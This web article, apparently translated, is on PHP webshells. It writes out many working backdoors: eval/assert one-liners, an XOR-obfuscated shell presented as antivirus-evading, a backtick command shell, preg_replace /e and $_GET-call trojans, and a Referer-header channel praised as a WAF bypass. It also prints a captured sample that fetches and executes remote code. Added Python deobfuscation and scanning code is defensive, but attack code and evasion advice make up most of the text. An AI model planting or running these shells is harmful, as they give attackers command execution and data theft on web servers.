How to identify and eliminate PHP webshells and backdoors

Source: Internet
Author: User


The most common backdoor looks like this:

<?php @eval($_POST['cmd']);?>

Or

<?php @assert($_POST['cmd']);?>

Tudouya published a construction technique for this on FreeBuf. The function name never appears in the file; it is assembled from XORed string literals (note that the third pair uses a backtick, "/" ^ "`", not a single quote):

<?php
@$_++;                     // $_ = 1 (++ on an undefined variable yields 1; @ silences the notice)
$__ = ("#" ^ "|");         // $__ = "_"
$__ .= ("." ^ "~");        // "_P"
$__ .= ("/" ^ "`");        // "_PO"
$__ .= ("|" ^ "/");        // "_POS"
$__ .= ("{" ^ "/");        // "_POST"
${$__}[!$_](${$__}[$_]);   // $_POST[0]($_POST[1]);
?>

Of course, written out like that it is too obvious, so the same thing collapses into one line:

<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");${$__}[!$_](${$__}[$_]);?>

Pad this with some ordinary-looking code as camouflage and you have a simple "kill-free" (AV-evading) shell sample: neither eval, assert nor the string _POST appears anywhere in the file.
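To see what such a file does without executing it, here is an added Python helper (not part of the original article) that evaluates the ("a" ^ "b") literal pairs and the .= concatenations in a PHP source the way the PHP engine would, and rewrites ${$__} to the recovered name. The regexes are deliberately narrow: they cover the two forms shown above (one string literal per XOR operand, no escape sequences), which is this example's own simplification; the two sample sources are constructed from the snippets above.

```python
import re

# Constructed samples: the two XOR shells from this page, comments removed.
SAMPLE = r'''<?php
@$_++;
$__ = ("#" ^ "|");
$__ .= ("." ^ "~");
$__ .= ("/" ^ "`");
$__ .= ("|" ^ "/");
$__ .= ("{" ^ "/");
${$__}[!$_](${$__}[$_]);
?>'''

ONE_LINER = r'''<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");${$__}[!$_](${$__}[$_]);?>'''

# A PHP string literal without escape sequences (enough for these samples).
LIT = r'"[^"\\]*"|\'[^\'\\]*\''
# Either ("lit" ^ "lit") or a bare literal; group 3 is set only for the bare case.
TERM = re.compile(r'\(\s*(' + LIT + r')\s*\^\s*(' + LIT + r')\s*\)|(' + LIT + r')')
# $var = expr;  or  $var .= expr;
ASSIGN = re.compile(r'(\$\w+)\s*(\.?=)\s*([^;]+);')


def php_str_xor(a: str, b: str) -> str:
    """PHP's ^ on two strings: XOR byte by byte, truncated to the shorter operand."""
    return ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


def eval_terms(expr: str) -> str:
    """Evaluate a '.'-joined chain of string literals and ("a" ^ "b") terms."""
    out = []
    for m in TERM.finditer(expr):
        if m.group(3) is not None:
            out.append(m.group(3)[1:-1])          # bare literal, quotes stripped
        else:
            out.append(php_str_xor(m.group(1)[1:-1], m.group(2)[1:-1]))
    return ''.join(out)


def resolve(php_source: str) -> dict:
    """Map every variable built from literals/XORs to its final string value."""
    values = {}
    for m in ASSIGN.finditer(php_source):
        var, op, expr = m.group(1), m.group(2), m.group(3)
        if not TERM.search(expr):
            continue                              # not a string-building assignment
        val = eval_terms(expr)
        values[var] = values.get(var, '') + val if op == '.=' else val
    return values


def deobfuscate(php_source: str) -> str:
    """Rewrite ${$var} as the resolved name so the shell reads as plain PHP."""
    src = php_source
    for var, val in resolve(php_source).items():
        src = src.replace('${' + var + '}', '$' + val)
    return src


if __name__ == '__main__':
    print(resolve(SAMPLE))          # {'$__': '_POST'}
    print(deobfuscate(ONE_LINER))
```

Resolving the identifier first is what makes signature matching meaningful here: the file never contains the string _POST, yet resolve() returns {'$__': '_POST'} and deobfuscate() turns the last statement into $_POST[!$_]($_POST[$_]);. Since $_ is 1 after @$_++ and !$_ is false, which PHP uses as array index 0, that is $_POST[0]($_POST[1]).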

Next, the simplest PHP backdoor of all. It uses no eval, no assert and no code-execution function by name, so scanners that look only for those miss it.

Run the code directly:

<?php
$c = urldecode($_GET['c']);
if ($c) {
    `$c`;                      // complete version
}
$_GET['c'] && `{$_GET['c']}`;  // streamlined version
/*
 * Principle: PHP executes anything wrapped in backticks as a system command.
 * Example: http://host/?c=type%20config.php>config.txt
 * Then download config.txt to read the contents.
 * Try a more exotic command, but don't do anything bad.
 */
?>

The principle is that PHP passes the text between backticks (the ` character, not a single quotation mark) straight to the system shell, exactly as shell_exec() does. The command's output is not echoed, which is why the example redirects it into a file. From there you can extend this however you like.

Now a small piece of code:

<?php preg_replace("/[errorpage]/e", @str_rot13('@nffreg($_CBFG[cntr]);'), "saft"); ?>

The password (POST parameter) is page. str_rot13() turns the replacement into @assert($_POST[page]);, the /e modifier makes preg_replace() evaluate the replacement as PHP, and the subject "saft" contains an a, so the character class [errorpage] matches once and the code runs.

Recently we captured a PHP webshell sample. Its clever dynamic code generation and page camouflage made the analysis quite entertaining, so let us share this Webshell.

The Webshell code is as follows:

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");
if (empty($_SESSION['api']))
    $_SESSION['api'] = substr(file_get_contents(sprintf('%s?%s', pack("H*", '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())), 3649);
@preg_replace("~(.*)~ies", gzuncompress($_SESSION['api']), null);
?>

The key is the following expression:

sprintf('%s?%s', pack("H*", '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())

pack("H*", ...) turns the hex string back into ASCII, so this evaluates to the URL of an image with a random cache-busting suffix:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

file_get_contents() then fetches the image as a string, substr() keeps everything after byte 3649 (the first 3649 bytes are the image itself), gzuncompress() inflates the compressed PHP appended to it, and preg_replace() with the e modifier executes the result; the subject is null, which (.*) matches once, so the code runs exactly once, and the payload is cached in $_SESSION['api'] so the download happens once per session. The following statement recovers the malicious sample code:

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s', pack("H*",
    '687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'), uniqid())), 3649));
?>

A one-liner with no recognisable signature:

<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode'] && preg_replace('\'a\'eis', 'e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))', 'a');
?>

The content of $_POST['code'] is stored in $_SESSION['theCode'], and then $_SESSION['theCode'] is executed. The highlight is that no signature string is present: eval is spelled out as 'e'.'v'.'a'.'l' inside the replacement, the pattern delimiter is a single quote, and execution happens through the e modifier, so a scanning tool that matches on eval( or assert( raises no alarm.
Super hidden PHP backdoor:

<?php $_GET[a]($_GET[b]);?>

Two GET parameters alone make up the Trojan. Usage (URL-decoded; Yy5waHA is the base64 of c.php, and the second base64 argument, not shown here, is the body of the one-line shell to be written):

?a=assert&b=${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(...))};

After execution, a one-line Trojan c.php appears in the current directory. With a=eval an error is reported, because eval is a language construct rather than a function and cannot be called through a variable; with a=assert the Trojan is written, because assert() is an ordinary function that evaluates a string argument as PHP code (this behaviour was removed in PHP 8.0). A one-liner this small extends to applications like this.
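Turning to the "identify" half of the title: the following Python scanner is an added example (not from the original article) that encodes one detection rule per backdoor family shown above, plus the Referer-carried variant covered in the next section, and runs them over constructed one-line samples. The rule ids, the list of superglobals and the SAMPLES dictionary are this example's own choices.

```python
import re

# Superglobals that carry attacker-controlled input.
SUPERGLOBAL = r'\$_(?:GET|POST|REQUEST|COOKIE|SESSION|SERVER)'

# (rule id, regex). Each rule targets one backdoor family from this page.
RULES = [
    # <?php @eval($_POST['cmd']);?>  /  @assert($_POST['cmd'])
    ('exec-request', re.compile(r'\b(?:eval|assert)\s*\(\s*@?' + SUPERGLOBAL)),
    # `{$_GET['c']}` : the backtick operator runs request data as a shell command
    ('backtick-request', re.compile(r'`[^`\n]*' + SUPERGLOBAL + r'[^`\n]*`')),
    # $_GET[a]($_GET[b]) : a request value used as a function name
    ('call-request', re.compile(SUPERGLOBAL + r'\s*\[[^\]]*\]\s*\(')),
    # ("#" ^ "|") : identifier assembled from XORed one-character literals
    ('xor-identifier', re.compile(r'\(\s*(["\']).\1\s*\^\s*(["\']).\2\s*\)')),
    # parse_str($_SERVER['HTTP_REFERER'], ...) : code smuggled in the Referer
    ('referer-channel', re.compile(r'parse_str\s*\(\s*\$_SERVER\s*\[\s*["\']HTTP_REFERER')),
    # eval/assert/preg_replace fed by a decoder (base64, rot13, gz)
    ('decoder-to-sink', re.compile(
        r'\b(?:eval|assert|preg_replace)\s*\([^;]*\b(?:base64_decode|str_rot13|gzuncompress|gzinflate)\s*\(')),
]

# First string argument of preg_replace(), honouring \' and \" escapes.
PREG_PATTERN = re.compile(r'preg_replace\s*\(\s*(["\'])((?:\\.|(?!\1).)*)\1', re.S)


def preg_e_modifier(src: str) -> bool:
    """True if a preg_replace() pattern literal carries the e (eval) modifier.

    Only paired delimiters such as /.../e, ~...~ies and '...'eis are handled;
    the bracket forms {...}e and (...)e are not (a simplification of this demo).
    """
    for m in PREG_PATTERN.finditer(src):
        pat = re.sub(r'\\(.)', r'\1', m.group(2))   # \' -> ' inside the PHP literal
        if not pat:
            continue
        end = pat.rfind(pat[0])                      # position of the closing delimiter
        if end > 0 and 'e' in pat[end + 1:]:
            return True
    return False


def scan(src: str) -> list:
    """Return the ids of every rule that fires on one PHP source file."""
    hits = [rule_id for rule_id, rx in RULES if rx.search(src)]
    if preg_e_modifier(src):
        hits.append('preg-e')
    return hits


# Constructed inputs: the one-liners from this page plus one benign file.
SAMPLES = {
    'eval_post': "<?php @eval($_POST['cmd']);?>",
    'backtick': "<?php $_GET['c']&&`{$_GET['c']}`;?>",
    'rot13_preg_e': '<?php preg_replace("/[errorpage]/e",@str_rot13(\'@nffreg($_CBFG[cntr]);\'),"saft"); ?>',
    'session_preg_e': "<?php session_start(); $_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']); "
                      "$_SESSION['theCode']&&preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\\'theCode\\']))','a'); ?>",
    'get_call': "<?php $_GET[a]($_GET[b]);?>",
    'xor_built': '<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");${$__}[!$_](${$__}[$_]);?>',
    'referer': "<?php parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='10'&&count($a)==9){eval(base64_decode(str_replace(' ','+',implode(array_slice($a,6)))));} ?>",
    'benign': "<?php $name = htmlspecialchars($_GET['name'] ?? ''); echo \"Hello, $name\"; ?>",
}


def scan_all() -> dict:
    """Run every sample through scan()."""
    return {name: scan(src) for name, src in SAMPLES.items()}


if __name__ == '__main__':
    for name, hits in scan_all().items():
        print(f"{name:15s} {hits or 'clean'}")
```

These are string signatures, so they catch the forms shown on this page and nothing cleverer; the XOR-built shell only trips xor-identifier because the XOR pairs themselves are a signature. Treat a scanner like this as a triage aid, not as proof that a tree is clean. Two of the tricks are also dead on current PHP: the preg_replace() e modifier was removed in PHP 7.0 and assert() stopped evaluating strings in PHP 8.0, so on such hosts the session and rot13 samples fail rather than execute.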
Layered request: running backdoor code through a second request. This method uses two files. File 1:

<?php
// 1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '10' && count($a) == 9) {
    eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>

File 2:

<?php
// 2.php
header('Content-type:text/html;charset=utf-8');
// code to be executed
$code = <<<CODE
phpinfo();
CODE;
// base64-encode it
$code = base64_encode($code);
// build the referer string
$referer = "a=10&b=AB&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
// backdoor URL
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer,
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);
?>

The base64-encoded code travels in the HTTP Referer header rather than in the query string or POST body. WAFs generally inspect the Referer loosely or not at all, so this bypasses them nicely.
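To see why 1.php needs the str_replace(" ", "+", ...) step, here is an added Python model (not the article's code) of both sides of the channel: build_referer() does what 2.php does, extract_blob() applies 1.php's guard and reassembly, and urllib's parse_qsl stands in for PHP's parse_str(), which likewise turns + into a space when it decodes the query string. The payload bytes, the suspicious_referer() heuristic and its base64-ish regex are constructed for this example.

```python
import base64
import re
from urllib.parse import parse_qsl

# Constructed payload for the demo. Its base64 form contains a '+', the byte
# that query-string decoding turns into a space on the server side.
CODE = b"f($o->x);"
B64 = base64.b64encode(CODE).decode()


def build_referer(code: bytes) -> str:
    """What 2.php sends: nine dummy-looking fields, payload in g, no URL encoding."""
    b64 = base64.b64encode(code).decode()
    return f"a=10&b=AB&c=34&d=re&e=32&f=km&g={b64}&h=&i="


def raw_values(referer: str) -> list:
    """Values as parse_str() hands them to 1.php: '+' has already become ' '."""
    return [v for _, v in parse_qsl(referer, keep_blank_values=True)]


def extract_blob(referer: str):
    """1.php's guard (first value '10', exactly nine fields) and reassembly.

    Returns the base64 text that eval(base64_decode(...)) would receive, or
    None when the guard rejects the request.
    """
    values = raw_values(referer)
    if len(values) != 9 or values[0] != '10':
        return None
    blob = ''.join(values[6:])          # implode(array_slice($a, 6)): g + h + i
    return blob.replace(' ', '+')        # str_replace(" ", "+", ...) undoes the decoding damage


def run_channel(code: bytes) -> bytes:
    """Full round trip: the bytes eval() in 1.php would execute for this payload."""
    blob = extract_blob(build_referer(code))
    return base64.b64decode(blob) if blob is not None else b""


# A field of 8+ base64-alphabet characters (space included, because of the
# '+' -> ' ' decoding) with optional padding. Constructed heuristic.
B64ISH = re.compile(r'^[A-Za-z0-9+/ ]{8,}={0,2}$')


def suspicious_referer(referer: str) -> bool:
    """Cheap WAF/log-review check for this channel.

    A genuine Referer is a URL; this one is a bare query string with no
    scheme whose fields include a base64-looking blob.
    """
    if '://' in referer:
        return False
    return any(B64ISH.match(v) for v in raw_values(referer))


if __name__ == '__main__':
    ref = build_referer(CODE)
    print(ref)
    print(raw_values(ref)[6])        # the '+' has become a space here
    print(run_channel(CODE))         # b'f($o->x);'
    print(suspicious_referer(ref))   # True
```

Without the replace step the reassembled text would contain a space where the + was and base64_decode() would return garbage, which is the one fragile point of the design. On the defensive side, the same property is the tell: a Referer that is not a URL at all, or that carries base64-looking fields, is worth logging even if the WAF does not inspect the header; the heuristic here will also flag some legitimate relative referers, so use it for review rather than blocking.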

Treat these PHP backdoors with a learning attitude; many of them show how much effort their authors put in.
